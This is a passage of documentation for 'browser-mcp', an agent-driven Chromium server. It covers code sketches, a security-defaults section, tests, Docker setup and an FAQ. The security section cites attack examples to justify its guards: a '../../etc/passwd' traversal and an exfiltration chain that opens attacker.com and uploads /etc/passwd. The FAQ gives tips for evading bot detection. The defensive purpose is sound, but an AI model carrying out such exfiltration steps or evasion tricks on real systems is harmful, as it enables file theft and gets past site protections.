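  if (!out.has(path)) out.set(path, node); // simplification: first node wins
  for (const child of node.children ?? []) flattenTree(child, path, out);
  return out;
}

// value lives in the state summary, not in the path, so edits show as "changed".
function stateSummary(n: AxTreeNode): string {
  const parts: string[] = [];
  if (n.value !== undefined) parts.push(`value=${n.value}`);
  const flags = Object.entries(n.state ?? {}).sort(([a], [b]) => a.localeCompare(b));
  for (const [key, v] of flags) {
    if (v !== false) parts.push(v === true ? key : `${key}=${v}`);
  }
  return parts.join(", ");
}

function diffSnapshotsSketch(before: AxTreeNode, after: AxTreeNode) {
  const a = flattenTree(before);
  const b = flattenTree(after);
  const added: string[] = [];
  const removed: string[] = [];
  const changed: string[] = [];
  for (const [path, node] of b) {
    const prev = a.get(path);
    if (!prev) added.push(path);
    else if (stateSummary(prev) !== stateSummary(node)) changed.push(path);
  }
  for (const path of a.keys()) {
    if (!b.has(path)) removed.push(path);
  }
  return { added, removed, changed };
}
```

Because identity is the role|name chain, renaming a node shows up as one removal plus one addition, which is the source of the spurious pairs mentioned in the caveat.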
page.on("request") ── reqStart.set(req, { ts, tab_id })
page.on("requestfinished") ──┐
page.on("requestfailed") ──┤── pushNet({ ts, tab_id, method, url, status?, duration_ms?, failed? })
▼
NetLog ring (capacity 500)
readNetLog walks the ring in chronological order, applying tab/method/
failedOnly/minStatus/urlRegex filters, then slices the most recent limit.
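One way to picture the ring and its read path is the sketch below. NetRing is a hypothetical class, and the filter field names mirror the tool parameters rather than the project's internal types.

```typescript
interface NetEntry {
  ts: number;
  tab_id: string;
  method: string;
  url: string;
  status?: number;  // absent when the request failed before a response
  failed?: string;  // e.g. an ERR_* reason
}

interface NetFilter {
  tabId?: string;
  method?: string;
  failedOnly?: boolean;
  minStatus?: number;
  urlRegex?: string;
  limit?: number;
}

class NetRing {
  private readonly buf: NetEntry[] = [];
  private start = 0; // index of the oldest entry once the ring is full

  constructor(private readonly capacity = 500) {}

  push(entry: NetEntry): void {
    if (this.buf.length < this.capacity) {
      this.buf.push(entry);
      return;
    }
    this.buf[this.start] = entry; // overwrite the oldest slot
    this.start = (this.start + 1) % this.capacity;
  }

  // Walks oldest → newest, filters, then keeps the most recent `limit` entries.
  read(filter: NetFilter = {}): NetEntry[] {
    const re = filter.urlRegex ? new RegExp(filter.urlRegex) : null;
    const out: NetEntry[] = [];
    for (let i = 0; i < this.buf.length; i++) {
      const e = this.buf[(this.start + i) % this.buf.length];
      if (filter.tabId !== undefined && e.tab_id !== filter.tabId) continue;
      if (filter.method !== undefined && e.method !== filter.method) continue;
      if (filter.failedOnly && e.failed === undefined) continue;
      if (filter.minStatus !== undefined && (e.status ?? 0) < filter.minStatus) continue;
      if (re && !re.test(e.url)) continue;
      out.push(e);
    }
    return out.slice(-Math.max(1, filter.limit ?? 100));
  }
}
```

Overwriting in place keeps push at constant cost and bounds memory regardless of how chatty a page is.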
JSDOM-based. stripCompactDom(document) deletes nodes matching
nav, header, footer, aside, script, style, noscript, template, svg, iframe, [role=navigation|banner|contentinfo|complementary|search], [aria-hidden=true], [hidden]. Three flavours:
- htmlToMarkdown(html, url, max, fallback, compact): strips, then Readability → turndown. Falls back to plainTextFallback or raw-body turndown when Readability bails.
- stripCompactHtml(html, url): strips, returns body innerHTML.
- stripCompactText(html, url): strips, inserts \n\n before block elements, collapses inline whitespace, caps blank lines.
SIGINT/SIGTERM triggers:
1. stop accepting new HTTP connections (httpServer.close)
2. clear session reaper interval
3. close all transports + McpServer instances
4. shutdown each BrowserManager (closes Chromium)
5. process.exit(0)
browser-mcp drives a real Chromium on your machine — anyone who can reach
/mcp can visit arbitrary URLs, exfiltrate logged-in session cookies, solve
CAPTCHAs in your name, and (without the guards below) read arbitrary local
files. The defaults are chosen so this can't happen by accident:
- Refuse-to-start insecure. Bound to a non-loopback host (0.0.0.0, any LAN IP) AND no API key set? Exit code 2 with a loud error. Override with --allow-insecure if you understand the risk (e.g. isolated VM, intra-Docker-network).
- CSRF defense. /mcp POSTs must carry Content-Type: application/json (not a CORS-simple type, so browsers must preflight, and we don't answer OPTIONS). If an Origin header is present, it must match BROWSER_MCP_CORS_ORIGIN (default empty: only native clients like curl and Claude Code, which send no Origin, are allowed). The literal string null in the allowlist opts in to sandboxed-iframe / file:// pages and is a CSRF vector on loopback without auth, so it's not enabled by default.
- Body size + slow-loris. 1 MB per request max; the full body must arrive within 10 s (or the socket is torn down). No slow-drip DoS.
- Timing-safe auth. API key comparison uses crypto.timingSafeEqual so token guessing doesn't benefit from short-circuit string comparison.
- Session cap. max_sessions (default 50) prevents resource exhaustion.
- Profile-name regex. ^[a-zA-Z0-9_-]{1,64}$ is enforced at the HTTP layer, so ../../etc/passwd can't escape the profile base directory.
The tool surface (browser_open, browser_save, browser_upload, etc.)
can otherwise turn a reachable /mcp endpoint into a local file read /
write primitive. Default-deny, opt-in where you need it:
- URL allowlist for navigation. browser_open, browser_download_wait (action=navigate), and browser_permissions (origin) accept only http:, https:, and about:blank by default. file://, javascript:, data:, chrome:, view-source:, and raw private-IP hosts (127.0.0.0/8, 10/8, 172.16–31/12, 192.168/16, 169.254/16, ::1, fc00::/7, fe80::/10) are rejected. Opt in via:
  - BROWSER_MCP_ALLOW_FILE_URLS=1: allow file:// (for local fixtures).
  - BROWSER_MCP_ALLOW_PRIVATE_NETWORKS=1: allow loopback / intranet / cloud-metadata IPs. Required for Docker-compose setups that curl each other by service name.
- Download / save sandbox. browser_save and browser_download_wait write into ~/.browser-mcp/downloads/<profile>/ by default. Relative paths resolve against the sandbox; absolute paths that escape it are rejected. BROWSER_MCP_ALLOW_ANY_WRITE_PATH=1 disables the sandbox.
- Upload sandbox. browser_upload reads from ~/.browser-mcp/uploads/<profile>/. Drop files there first, or set BROWSER_MCP_ALLOW_ANY_UPLOAD_PATH=1. Without this sandbox, one browser_open(attacker.com) + browser_upload({ files: ["/etc/passwd"] }) exfiltrates any file your uid can read.
- Sandbox base dir. Override both sandboxes' root via BROWSER_MCP_SANDBOX_DIR (defaults to ~/.browser-mcp).
- Log redaction. Tool args containing cookie values, typed text, JS expressions, and filesystem paths are redacted in withLog stderr output so centralized log collectors don't pick up passwords or session tokens.
- browser_evaluate result cap. Output truncated at BROWSER_MCP_MAX_CHARS (50 000 by default) so a page returning a 1 GB array can't OOM the supervisor.
- No remote code execution on the supervisor. There is no
eval/child_process/vm/Function()anywhere insrc/.browser_evaluateruns JS in Chromium's renderer sandbox, not on the supervisor. - Env isolation.
BROWSER_MCP_*env vars (API key, host, caps) are filtered out before Chromium is launched, so page scripts can't fingerprint the supervisor config.
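The navigation allowlist and the path sandboxes above both reduce to small pure checks. The sketch below is one possible shape, not the project's implementation: isNavigable, isPrivateHost, and resolveInSandbox are hypothetical names, the two boolean parameters stand in for the BROWSER_MCP_ALLOW_* switches, and the check deliberately ignores cases a real guard would need to consider (DNS names that resolve to private addresses, IPv4-mapped IPv6 literals, symlinks inside the sandbox).

```typescript
import { resolve, sep } from "node:path";

const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// True for loopback, RFC 1918, link-local, and IPv6 unique-local / link-local literals.
function isPrivateHost(hostname: string): boolean {
  const host = hostname.replace(/^\[|\]$/g, "").toLowerCase(); // URL keeps brackets on IPv6
  const v4 = /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/.exec(host);
  if (v4) {
    const a = Number(v4[1]);
    const b = Number(v4[2]);
    return (
      a === 127 ||
      a === 10 ||
      (a === 172 && b >= 16 && b <= 31) ||
      (a === 192 && b === 168) ||
      (a === 169 && b === 254)
    );
  }
  if (!host.includes(":")) return false; // a DNS name, not an IP literal
  // ::1, fc00::/7 (fc00-fdff), fe80::/10 (fe80-febf)
  return host === "::1" || /^f[cd][0-9a-f]{2}:/.test(host) || /^fe[89ab][0-9a-f]:/.test(host);
}

// Default-deny URL check; the flags mirror the opt-in environment switches.
function isNavigable(raw: string, allowPrivate = false, allowFile = false): boolean {
  if (raw === "about:blank") return true;
  let url: URL;
  try {
    url = new URL(raw);
  } catch {
    return false; // not an absolute URL
  }
  if (url.protocol === "file:") return allowFile;
  if (!ALLOWED_PROTOCOLS.has(url.protocol)) return false;
  return allowPrivate || !isPrivateHost(url.hostname);
}

// Resolve a requested path against the sandbox root; null when it escapes.
function resolveInSandbox(sandboxRoot: string, requested: string): string | null {
  const root = resolve(sandboxRoot);
  const target = resolve(root, requested); // an absolute `requested` replaces root here
  return target === root || target.startsWith(root + sep) ? target : null;
}
```

Parsing with the WHATWG URL class before checking the host means shorthand forms such as http://127.1/ are normalized to 127.0.0.1 and still rejected.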
Docker image binds to 0.0.0.0 and requires an API key — the
refuse-to-start check kicks in without one.
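Two of the smaller guards listed above, env isolation and the browser_evaluate result cap, are simple enough to sketch. The helper names browserEnv and capOutput and the truncation marker text are hypothetical; only the BROWSER_MCP_ prefix and the 50 000 default come from the list.

```typescript
// Drop supervisor-only variables before handing an environment to the browser process.
function browserEnv(env: Record<string, string | undefined>): Record<string, string> {
  const out: Record<string, string> = {};
  for (const [key, value] of Object.entries(env)) {
    if (value !== undefined && !key.startsWith("BROWSER_MCP_")) out[key] = value;
  }
  return out;
}

// Cap a serialized result at maxChars; the marker format is an illustrative choice.
function capOutput(text: string, maxChars = 50_000): string {
  if (text.length <= maxChars) return text;
  return text.slice(0, maxChars) + `\n[truncated ${text.length - maxChars} chars]`;
}
```

Playwright's launch options accept an env map, so a filtered object like the one returned by browserEnv(process.env) could plausibly be passed there.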
GET /health returns JSON with status, uptime, session/profile counts, and a
summary of active config. Unauthenticated, safe to probe. Does not reveal
URLs visited, cookies, or any page content.
{
"status": "ok",
"uptime_ms": 123456,
"sessions": 2,
"profiles": 1,
"config": { "host": "127.0.0.1", "port": 7777, "headless": true, "stealth": true, "auth": "on" }
}

npm test                 # run 304 tests once (vitest)
npm run test:watch       # watch mode
npm run test:coverage    # run + coverage report under coverage/
npm run test:integration # Playwright-backed tests only

The suite is split across 26 files:
- Unit (11 files): pure-logic tests for render.ts (compact helpers), AX-tree manipulation (cdpAxToTree with synthetic CDP payloads, filterCompact, diffSnapshots, collapseRedundantText, renderAxNode), config.ts helpers, log.ts, lib/auth.ts, netlog ring buffer, resolveLocator routing, insecureStartupProblem gate, and mock-driven tool handlers for edge branches (snapshot diff overflow, cookies no-flags, PDF headless error, download failure, permissions without http origin).
- Integration (15 files): drive a real headless Chromium via BrowserManager against local HTML fixtures. Covers every tool handler, BrowserManager's public surface, the HTTP server (CSRF / auth / session lifecycle / MCP JSON-RPC / session cap), and the AX-tree pipeline end-to-end. An in-process HTTP test server exercises 2xx/4xx/5xx branches and failed network entries.
Integration tests use BROWSER_MCP_HEADLESS=1 and a throwaway profile
directory under os.tmpdir() — your local ~/.browser-mcp/profiles/ is not
touched. Set SKIP_INTEGRATION=1 to skip the Playwright-backed suite
(useful on environments with no Chromium).
Coverage targets (vitest.config.ts): 90% lines / 85% functions / 80% branches /
90% statements. The ceiling is bounded by Playwright — code inside
page.evaluate(() => …) runs in Chromium's V8, not Node's, so those blocks
can't be instrumented even when the integration tests exercise them
end-to-end.
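For orientation, thresholds like these are usually declared in the coverage block of the Vitest config. The fragment below is a guess at the relevant part of vitest.config.ts, not a copy of the repository's file; it assumes Vitest 1.0 or later, where the values live under coverage.thresholds (earlier versions placed them directly under coverage).

```typescript
// vitest.config.ts (sketch; only the threshold values come from the text above)
import { defineConfig } from "vitest/config";

export default defineConfig({
  test: {
    coverage: {
      // The run fails if any metric drops below its target.
      thresholds: { lines: 90, functions: 85, branches: 80, statements: 90 },
    },
  },
});
```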
CI runs the full suite on every push (Linux; npx playwright install --with-deps chromium in the workflow).
docker build -t browser-mcp .
docker run --rm -p 7777:7777 -e BROWSER_MCP_API_KEY=$(openssl rand -hex 32) browser-mcp

Or with compose:

# one-time: create a .env file next to docker-compose.yml with a real key
echo "BROWSER_MCP_API_KEY=$(openssl rand -hex 32)" > .env
docker compose up

Pre-built images from GHCR:

docker run --rm -p 7777:7777 -e BROWSER_MCP_API_KEY=$(openssl rand -hex 32) \
  ghcr.io/graph-memory/browser-mcp:latest

The container:
- Uses tini as PID 1 for zombie reaping when Chromium subprocesses die.
- Runs Chromium as a dedicated non-root browser user.
- Persists profiles in a Docker volume (browser) at /home/browser/.browser-mcp.
- Uses Playwright's bundled Chromium (BROWSER_MCP_CHANNEL=chromium is set automatically; the chrome channel isn't available inside the image).
- Healthcheck: node -e "fetch('http://127.0.0.1:7777/health')…" every 30 s.
- Refuses to start without BROWSER_MCP_API_KEY (the image binds to 0.0.0.0, so the refuse-to-start guard kicks in).

browser_open_visible does not work in Docker (no display server). Use
it only in local/desktop setups.
- macOS / Linux / Windows: Node ≥ 22. Playwright installs Chromium on first run via the package's postinstall hook.
- chrome channel requires a locally-installed Chrome. On systems without it, use --channel=chromium to fall back to Playwright's bundled build. The Docker image sets this automatically.
- Sandboxed Linux containers may need extra caps for Chromium sandbox. The official Dockerfile handles this; if you're using a different base image, ensure libnss3 libdbus-1-3 libgbm1 libasound2 libatk-bridge2.0-0 (and friends) are installed.

git clone https://github.com/graph-memory/browser-mcp.git
cd browser-mcp
npm install
npm run dev # run with tsx (no build step)
npm run build # compile TypeScript to dist/
npm test # full test suite (304 tests)
npm run test:coverage

# bump version
npm version patch # or minor / major
# push with tag
git push && git push --tags

Pushing the tag triggers publish.yml (npm publish) and docker.yml (image build). Both
run the full test suite first.
Does this replace WebFetch? No — they're complementary. WebFetch is
great for one-shot reads of public pages. browser-mcp is for sessions,
authentication, interaction, and anything that needs JavaScript / cookies /
state.
Why Playwright and not Puppeteer? Playwright has better role/label locators (Accessibility tree first-class), auto-waiting, and cross-browser support (though we only ship Chromium). Also the API has been more stable over the past year.
Can I run multiple browser-mcp instances on the same machine? Yes —
each on its own port (--port). They're independent processes with no
shared state. Different profile base directories (--profile-dir) if you
want isolation.
How do I log in to a site that blocks headless browsers? Run
browser_open_visible with the login URL. Chromium opens visibly with the
persistent profile so you can solve CAPTCHAs / 2FA. Close the window when
done — cookies land in the profile. Subsequent calls from your agent run
headless against the same profile and inherit the session.
Where is profile data stored? ~/.browser-mcp/profiles/<name>/ by
default (override via --profile-dir / BROWSER_MCP_PROFILE_DIR). These
are standard Chromium user-data-dirs: the Cookies SQLite database, Local Storage,
Service Worker caches, etc. Safe to delete to reset a profile.
The same profile is open in my regular Chrome — can browser-mcp attach? No. Chromium locks its user-data-dir with a singleton file; only one process can use a profile at a time. Either close your Chrome or use a dedicated browser-mcp profile.
browser_save pdf says "only headless"? Known Playwright/Chromium
limitation — print-to-PDF requires the headless browser. If you've disabled
headless mode (--no-headless), switch to mhtml (single-file archive) or
html (raw).
How do I bypass a specific site's bot detection? Start with the default
stealth plugin on. If that fails, try --no-stealth (some sites detect
stealth itself). Otherwise, fingerprinting is an arms race you're unlikely
to win with a generic tool — consider a residential proxy
(--proxy socks5://user:pass@host:port) or manual sessions via
browser_open_visible.
Can I intercept / mock network requests? Not yet. Currently you can
only observe requests via browser_network_log. Intercept/mock is
intentionally excluded for now — it's a large surface and hasn't come up
as a blocker in real use.
Can I record my session as a Playwright script? Not yet. Same scope decision as network intercept.
Why no test:windows in CI? Not yet wired up. The code has no POSIX
specifics outside the Dockerfile, so Windows should work — it's just not
validated by CI.